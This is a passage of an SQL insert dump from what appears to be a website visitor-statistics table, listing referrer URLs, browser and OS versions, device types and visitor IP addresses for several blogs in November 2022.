(25468,'2022-11-09','http://wikisonnati.com/blog/','Chrome','Windows','90.0.4430.85','desktop','Unknown','','5.58.187.240','000',0,2,0),
(25469,'2022-11-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,4,0),
(25470,'2022-11-09','http://ictbank.ir/blog/index.php/product-category/uncategorized/','Chrome','Windows','90.0.4400.8','desktop','Unknown','','37.139.53.20','000',0,7,0),
(25471,'2022-11-09','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.157','desktop','Unknown','','51.254.199.11','000',0,3,0),
(25472,'2022-11-09','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','198.20.69.98','000',0,2,0),
(25473,'2022-11-09','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','185.68.185.200','000',0,1,0),
(25474,'2022-11-09','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(25475,'2022-11-09','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,6,0),
(25476,'2022-11-09','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','192.71.30.89','000',0,1,0),
(25477,'2022-11-09','http://ictbank.ir/blog','Firefox','Ubuntu','3.6.11','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25478,'2022-11-09','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(25479,'2022-11-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(25480,'2022-11-09','http://ictbank.ir/blog','Chrome','OS X','79.0.3945.88','desktop','Macintosh','','159.89.46.171','000',0,2,0),
(25481,'2022-11-10','http://ictbank.ir/blog','Safari','OS X','15.4','desktop','Macintosh','','88.218.47.132','000',0,1,0),
(25482,'2022-11-10','http://45.92.94.221/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.122.184','000',0,4,0),
(25483,'2022-11-10','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.25','000',0,2,0),
(25484,'2022-11-10','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(25485,'2022-11-10','http://www.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.51.222','000',0,2,0),
(25486,'2022-11-10','http://ns11.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.35.128','000',0,4,0),
(25487,'2022-11-10','http://wikisonnati.com/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','5.189.183.89','000',0,2,0),
(25488,'2022-11-10','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','210.154.138.195','000',0,1,0),
(25489,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','54.162.215.62','000',0,1,0),
(25490,'2022-11-10','http://design-arena.ir/blog','Yandex Browser','Windows','22.7.0','desktop','Unknown','','193.233.90.177','000',0,2,0),
(25491,'2022-11-10','http://ictbank.ir/blog','Firefox','Windows','3.6.23','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25492,'2022-11-10','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.13','000',0,2,0),
(25493,'2022-11-10','http://ictbank.ir/blog','Chrome','OS X','106.0.0.0','desktop','Macintosh','','69.222.188.76','000',0,1,0),
(25494,'2022-11-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(25495,'2022-11-10','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','14.232.208.220','000',0,1,0),
(25496,'2022-11-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25497,'2022-11-10','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.7','000',0,1,0),
(25498,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','34.0.1847.116','desktop','Unknown','','46.101.9.216','000',0,1,0),
(25499,'2022-11-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,2,0),
(25500,'2022-11-10','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','112.193.195.151','000',0,1,0),
(25501,'2022-11-10','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','36.32.2.160','000',0,1,0),
(25502,'2022-11-10','http://www.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.49.169','000',0,2,0),
(25503,'2022-11-10','http://45.92.94.221/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(25504,'2022-11-10','http://ictbank.ir/blog','Chrome','OS X','87.0.4280.88','desktop','Macintosh','','209.141.36.231','000',0,2,0),
(25505,'2022-11-10','http://ictbank.ir/blog','Chrome','OS X','87.0.4280.88','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(25506,'2022-11-10','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(25507,'2022-11-10','http://ictbank.ir/blog','Chrome','OS X','87.0.4280.88','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(25508,'2022-11-10','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.12','000',0,2,0),
(25509,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','65.0.3152.119','desktop','Unknown','','77.78.109.212','000',0,2,0),
(25510,'2022-11-10','http://ictbank.ir','Edge','Windows','96.0.1054.43','desktop','Unknown','','107.178.238.62','000',0,1,0),
(25511,'2022-11-10','http://ictbank.ir/blog','Edge','Windows','96.0.1054.43','desktop','Unknown','','3.232.207.53','000',0,1,0),
(25512,'2022-11-10','http://ictbank.ir/blog','Edge','Windows','96.0.1054.43','desktop','Unknown','','3.101.55.148','000',0,1,0),
(25513,'2022-11-10','http://ictbank.ir/blog','Edge','Windows','96.0.1054.43','desktop','Unknown','','3.95.154.181','000',0,2,0),
(25514,'2022-11-10','http://ictbank.ir','Firefox Focus','Android','1.0','mobile:smart','Unknown','','107.178.238.48','000',0,1,0),
(25515,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','99.0.4844.51','desktop','Unknown','','194.154.78.227','000',0,1,0),
(25516,'2022-11-10','http://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','185.220.102.241','000',0,1,0),
(25517,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','3.249.108.121','000',0,1,0),
(25518,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','54.245.4.251','000',0,1,0),
(25519,'2022-11-10','http://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','89.208.29.220','000',0,1,0),
(25520,'2022-11-10','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.90','000',0,2,0),
(25521,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','204.101.161.19','000',0,3,0),
(25522,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.89','desktop','Unknown','','82.199.134.164','000',0,1,0),
(25523,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','192.30.83.226','000',0,1,0),
(25524,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','185.181.115.79','000',0,1,0),
(25525,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','185.181.115.78','000',0,1,0),
(25526,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','104.0.0.0','desktop','Unknown','','213.188.95.128','000',0,1,0),
(25527,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','56.0.2924.87','desktop','Unknown','','31.154.162.118','000',0,2,0),
(25528,'2022-11-10','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(25529,'2022-11-10','http://ictbank.ir/blog/','Safari','iOS','16.0','mobile:smart','iPhone','','87.115.231.174','000',0,2,0),
(25530,'2022-11-10','http://ictbank.ir/blog/','Chrome','Windows','106.0.0.0','desktop','Unknown','','193.36.118.254','000',0,1,0),
(25531,'2022-11-10','http://ictbank.ir/blog/','Chrome','Android','105.0.5195.136','mobile:smart','Unknown','','172.241.131.140','000',0,1,0),
(25532,'2022-11-10','http://ictbank.ir/blog/','Firefox','Ubuntu','107.0','desktop','Unknown','','165.231.253.254','000',0,2,0),
(25533,'2022-11-10','http://ictbank.ir/blog/','Safari','iOS','16.1','mobile:smart','iPhone','','68.183.245.101','000',0,1,0),
(25534,'2022-11-10','http://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','92.17.136.217','000',0,1,0),
(25535,'2022-11-10','http://ictbank.ir/blog','Safari','iOS','16.0','mobile:smart','iPhone','','23.83.130.183','000',0,1,0),
(25536,'2022-11-10','http://ictbank.ir/blog','Chromium','Ubuntu','68.0.3440.106','desktop','Unknown','','121.46.142.244','000',0,1,0),
(25537,'2022-11-10','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25538,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.60','desktop','Unknown','','81.161.59.17','000',0,1,0),
(25539,'2022-11-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.0.229','000',0,1,0),
(25540,'2022-11-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','82.196.5.234','000',0,1,0),
(25541,'2022-11-10','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25542,'2022-11-10','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25543,'2022-11-10','http://ictbank.ir/blog','Chrome','Windows','77.0.3865.75','desktop','Unknown','','52.17.54.30','000',0,1,0),
(25544,'2022-11-10','http://45.92.94.221/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','104.218.165.182','000',0,3,0),
(25545,'2022-11-11','http://ictbank.ir/blog','Firefox','OS X','3.6.11','desktop','Macintosh','','208.80.194.122','000',0,3,0),
(25546,'2022-11-11','http://ictbank.ir/blog','Chrome','Windows','80.0.3987.106','desktop','Unknown','','54.92.128.141','000',0,1,0),
(25547,'2022-11-11','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(25548,'2022-11-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(25549,'2022-11-11','http://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','35.90.52.181','000',0,1,0),
(25550,'2022-11-11','http://ictbank.ir','Chrome','Windows','80.0.3987.116','desktop','Unknown','','95.214.52.187','000',0,1,0),
(25551,'2022-11-11','http://ictbank.ir/blog','Chrome','Windows','65.0.3152.119','desktop','Unknown','','122.154.101.138','000',0,2,0),
(25552,'2022-11-11','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','159.203.84.63','000',0,2,0),
(25553,'2022-11-11','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25554,'2022-11-11','http://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','78.135.80.121','000',0,2,0),
(25555,'2022-11-11','http://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','78.135.80.120','000',0,2,0),
(25556,'2022-11-11','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','143.110.186.162','000',0,2,0),
(25557,'2022-11-11','http://ictbank.ir/blog','Chrome','Windows','65.0.3152.119','desktop','Unknown','','5.196.35.145','000',0,3,0),
(25558,'2022-11-11','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','91.32.226.87','000',0,2,0),
(25559,'2022-11-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,2,0),
(25560,'2022-11-11','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.90','000',0,2,0),
(25561,'2022-11-11','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','3.135.244.13','000',0,4,0),
(25562,'2022-11-11','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.105.100','000',0,2,0),
(25563,'2022-11-11','http://design-arena.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.222','000',0,1,0),
(25564,'2022-11-11','http://design-arena.ir/blog/','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.230','000',0,1,0),
(25565,'2022-11-11','http://ictbank.ir/','Yandex Browser','OS X','22.7.0','desktop','Macintosh','','196.196.247.127','000',0,1,0),
(25566,'2022-11-11','http://ictbank.ir/blog','Chrome','Windows','97.0.4692.71','desktop','Unknown','','185.220.103.7','000',0,1,0),
(25567,'2022-11-11','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.75','desktop','Unknown','','209.170.91.202','000',0,1,0),
(25568,'2022-11-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25569,'2022-11-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.0.229','000',0,1,0),
(25570,'2022-11-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25571,'2022-11-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25572,'2022-11-11','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25573,'2022-11-11','http://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(25574,'2022-11-11','http://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.219','000',0,1,0),
(25575,'2022-11-11','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','62.171.177.111','000',0,2,0),
(25576,'2022-11-12','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','94.102.51.9','000',0,4,0),
(25577,'2022-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(25578,'2022-11-12','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','5.161.105.47','000',0,1,0),
(25579,'2022-11-12','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','42.83.147.34','000',0,2,0),
(25580,'2022-11-12','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(25581,'2022-11-12','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','182.61.11.53','000',0,2,0),
(25582,'2022-11-12','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.241.30','000',0,1,0),
(25583,'2022-11-12','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(25584,'2022-11-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25585,'2022-11-12','http://www.wikisonnati.com/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','223.240.99.104','000',0,2,0),
(25586,'2022-11-12','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','212.102.55.113','000',0,6,0),
(25587,'2022-11-12','http://ictbank.ir/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','23.229.104.2','000',0,2,0),
(25588,'2022-11-12','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(25589,'2022-11-12','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(25590,'2022-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(25591,'2022-11-12','http://ictbank.ir/blog','Firefox','Fedora','102.0','desktop','Unknown','','194.36.99.194','000',0,10,0),
(25592,'2022-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25593,'2022-11-12','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25594,'2022-11-12','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,8,0),
(25595,'2022-11-12','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','3.236.176.177','000',0,1,0),
(25596,'2022-11-12','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','104.248.9.108','000',0,3,0),
(25597,'2022-11-12','http://ictbank.ir/blog','Firefox','Fedora','102.0','desktop','Unknown','','196.19.240.74','000',0,12,0),
(25598,'2022-11-12','http://www.ictbank.ir/blog','Firefox','Fedora','102.0','desktop','Unknown','','191.96.252.161','000',0,2,0),
(25599,'2022-11-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.12.130','000',0,1,0),
(25600,'2022-11-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.14.171','000',0,1,0),
(25601,'2022-11-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,1,0),
(25602,'2022-11-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25603,'2022-11-12','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','109.239.58.107','000',0,1,0),
(25604,'2022-11-12','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.46','000',0,1,0),
(25605,'2022-11-12','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25606,'2022-11-13','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,4,0),
(25607,'2022-11-13','http://ictbank.ir/blog','Chrome','Windows','60.0.3074.95','desktop','Unknown','','18.206.221.148','000',0,2,0),
(25608,'2022-11-13','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(25609,'2022-11-13','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(25610,'2022-11-13','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','94.102.51.9','000',0,4,0),
(25611,'2022-11-13','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.742.112','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25612,'2022-11-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,4,0),
(25613,'2022-11-13','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25614,'2022-11-13','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(25615,'2022-11-13','http://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(25616,'2022-11-13','http://ictbank.ir/blog','Firefox','Windows','105.0','desktop','Unknown','','185.99.135.187','000',0,2,0),
(25617,'2022-11-13','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.164.227','000',0,2,0),
(25618,'2022-11-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,2,0),
(25619,'2022-11-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25620,'2022-11-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,1,0),
(25621,'2022-11-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(25622,'2022-11-13','http://45.92.94.221/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.189','000',0,1,0),
(25623,'2022-11-13','http://45.92.94.221/blog/','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.34','000',0,1,0),
(25624,'2022-11-13','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.66','000',0,1,0),
(25625,'2022-11-14','http://ictbank.ir/blog/index.php/category/database/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','37.139.53.20','000',0,7,0),
(25626,'2022-11-14','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,18,0),
(25627,'2022-11-14','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25628,'2022-11-14','https://www.google.com','Chrome','Windows','85.0.4183.83','desktop','Unknown','','167.114.173.203','000',0,41,0),
(25629,'2022-11-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,4,0),
(25630,'2022-11-14','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.147','000',0,2,0),
(25631,'2022-11-14','https://www.google.com/','Firefox','Windows','106.0','desktop','Unknown','','5.201.139.150','000',0,1,0),
(25632,'2022-11-14','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(25633,'2022-11-14','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25634,'2022-11-14','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(25635,'2022-11-14','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25636,'2022-11-14','https://www.google.com/','Chrome','Windows','103.0.0.0','desktop','Unknown','','147.161.185.98','000',0,1,0),
(25637,'2022-11-14','http://ictbank.ir/blog','Yandex Browser','OS X','22.7.0','desktop','Macintosh','','45.148.234.160','000',0,1,0),
(25638,'2022-11-14','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','193.118.53.138','000',0,2,0),
(25639,'2022-11-14','https://www.google.com/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','123.24.191.253','000',0,1,0),
(25640,'2022-11-14','http://design-arena.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','45.138.100.11','000',0,2,0),
(25641,'2022-11-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.12.130','000',0,1,0),
(25642,'2022-11-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(25643,'2022-11-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.229.203','000',0,1,0),
(25644,'2022-11-14','http://ictbank.ir/blog','Chrome','OS X','79.0.3945.88','desktop','Macintosh','','134.209.38.228','000',0,1,0),
(25645,'2022-11-14','http://design-arena.ir/blog','Firefox','Windows','103.0','desktop','Unknown','','192.36.53.165','000',0,1,0),
(25646,'2022-11-14','http://design-arena.ir/blog/','Firefox','Windows','103.0','desktop','Unknown','','192.71.38.71','000',0,1,0),
(25647,'2022-11-14','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.79','000',0,4,0),
(25648,'2022-11-14','http://ictbank.ir/blog','Chrome','Windows','12.0.742.91','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25649,'2022-11-14','http://45.92.94.221/blog','Chrome','Linux','44.0.2403.157','desktop','Unknown','','157.230.28.105','000',0,2,0),
(25650,'2022-11-14','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25651,'2022-11-15','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,12,0),
(25652,'2022-11-15','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(25653,'2022-11-15','http://ictbank.ir/blog','Chrome','Windows','16.0.912.63','desktop','Unknown','','208.80.194.122','000',0,3,0),
(25654,'2022-11-15','https://www.google.com/','Chrome','iOS','107.0.5304.101','mobile:smart','iPhone','','67.212.64.194','000',0,1,0),
(25655,'2022-11-15','http://design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','207.180.240.189','000',0,2,0),
(25656,'2022-11-15','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,4,0),
(25657,'2022-11-15','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(25658,'2022-11-15','http://wikisonnati.com/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','113.108.9.38','000',0,2,0),
(25659,'2022-11-15','http://ictbank.ir/blog/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','46.191.249.128','000',0,6,0),
(25660,'2022-11-15','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','212.102.55.113','000',0,6,0),
(25661,'2022-11-15','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','45.33.102.90','000',0,2,0),
(25662,'2022-11-15','http://wikisonnati.com/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.120','000',0,1,0),
(25663,'2022-11-15','http://wikisonnati.com/blog/','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.69','000',0,1,0),
(25664,'2022-11-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,2,0),
(25665,'2022-11-15','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','79.16.83.198','000',0,1,0),
(25666,'2022-11-15','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','66.249.81.109','000',0,1,0),
(25667,'2022-11-15','http://45.92.94.221:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25668,'2022-11-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(25669,'2022-11-15','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.71','000',0,2,0),
(25670,'2022-11-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(25671,'2022-11-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25672,'2022-11-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(25673,'2022-11-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,1,0),
(25674,'2022-11-15','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(25675,'2022-11-15','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(25676,'2022-11-15','http://45.92.94.221:80/blog','Chrome','Windows','68.0.3440.106','desktop','Unknown','','163.172.203.96','000',0,2,0),
(25677,'2022-11-15','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.141','000',0,2,0),
(25678,'2022-11-15','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25679,'2022-11-15','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','68.183.145.166','000',0,2,0),
(25680,'2022-11-15','http://45.92.94.221:80/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','35.168.113.139','000',0,2,0),
(25681,'2022-11-15','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','146.59.44.45','000',0,1,0),
(25682,'2022-11-15','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','185.247.226.98','000',0,1,0),
(25683,'2022-11-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(25684,'2022-11-16','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,5,0),
